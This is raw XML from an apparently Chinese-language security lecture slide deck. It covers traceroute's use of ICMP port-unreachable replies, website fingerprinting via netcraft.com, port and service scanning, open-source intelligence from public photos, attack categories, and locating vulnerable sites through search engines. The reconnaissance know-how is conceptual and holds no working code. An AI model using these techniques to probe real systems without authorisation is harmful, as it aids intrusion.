            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4128" y="1027"/>
                <a:ext cx="423"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8939" name="Text Box 43"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4579" y="1027"/>
                <a:ext cx="461"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11" name="Group 44"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="3962400"/>
            <a:ext cx="3124200" cy="1436688"/>
            <a:chOff x="3600" y="2496"/>
            <a:chExt cx="1968" cy="1056"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32795" name="Rectangle 45"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3600" y="2496"/>
              <a:ext cx="1968" cy="1056"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFCC99"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>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42" name="Text Box 46"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3648" y="2592"/>
              <a:ext cx="1824" cy="882"/>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port number</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>：设置为一般应用程序都不会用的号码（</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>30000 </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>以上），所以当此数据包 到达目的地后该主机会送回一个「</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>ICMP port unreachable</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1200">
                  <a:effectLst>
                    <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                      <a:srgbClr val="C0C0C0"/>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>」的消息，而当源主机收到这个消息时，便知道目的地已经到达了。</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 47"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1185863" y="2841625"/>
            <a:ext cx="7086600" cy="1189038"/>
            <a:chOff x="747" y="1790"/>
            <a:chExt cx="4464" cy="749"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32792" name="AutoShape 48"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="2978" y="-441"/>
              <a:ext cx="1" cy="4464"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 54099986"/>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93" name="Rectangle 49"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2736" y="2256"/>
              <a:ext cx="1104" cy="144"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>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46" name="Text Box 50"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2800" y="2251"/>
              <a:ext cx="1056" cy="288"/>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port unreachable</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 51"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2411413"/>
            <a:ext cx="2438400" cy="2663825"/>
            <a:chOff x="432" y="1519"/>
            <a:chExt cx="1536" cy="1678"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="208948" name="Text Box 52"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="576" y="3024"/>
              <a:ext cx="139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我到达了目的地</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32791" name="AutoShape 53"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="208948" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="432" y="1519"/>
              <a:ext cx="144" cy="1592"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val -100000"/>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49659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57200" y="1179307"/>
            <a:ext cx="8229600" cy="1097565"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可查询大部分知名网站的信息。如网站运行在什么服务器，用什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器，甚至网站在哪个机房。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>netcraft.com </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="107505" y="2153029"/>
            <a:ext cx="8579295" cy="4679615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1666997724"/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>使用应用程序测试：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>如：使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>等用户软件向目标主机申请服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>如果主机有应答就说明主机提供了这个服务，开放了这个端口的服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>网络扫描工具软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>对目标主机一定范围的端口进行扫描。这样可以全部掌握目标主机的端口情况。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165890" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>端口、服务分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4D45FE2D-6386-4DCB-9242-98E6F439C7F8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1179307"/>
            <a:ext cx="8229600" cy="1565482"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>合理利用和分析公开信息，信息后面能反馈出什么？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从著名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>照片泄密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>案件到“如何用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>入侵网站”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                                                               </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146434" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>公开信息的分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1464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2960688"/>
            <a:ext cx="218122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矩形 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2936875" y="2744788"/>
            <a:ext cx="588327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0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1964</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中国画报</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>封面铁人</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>王进喜大庆油田</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衣着判断：北纬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>46</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>度至</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>48</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>度的区域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>齐齐哈尔与哈尔滨之间</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所握手柄的架式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>油井的直径</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钻井与背后油田间的距离和井架密度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>储量和产量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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日本因此设计出适合中国大庆的设备，一举中标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196926606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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>信息保障技术框架（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IATF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>》3.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版中将攻击分为以下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类： </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>被动攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>主动攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>物理临近攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内部人员攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>软硬件配装攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284674" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>攻击的种类</a:t>
            </a:r>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ED037B54-41A4-4950-83FD-BF340C20BBAC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3661435692"/>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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>举例：某网络提供商在其网站上宣传</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>“特惠服务器租用：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>RedHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> Linux 8.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MY SQL/PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>采用性能优异的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Apache 1.3.XX Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>搜索引擎</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>搜索</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>例：某</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务器存在致命错误脚本“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5sf67.jsp”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者可通过搜索引擎查找存在该错误脚本的网站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4658178" name="Rectangle 2"/>
          <p:cNvSpPr>
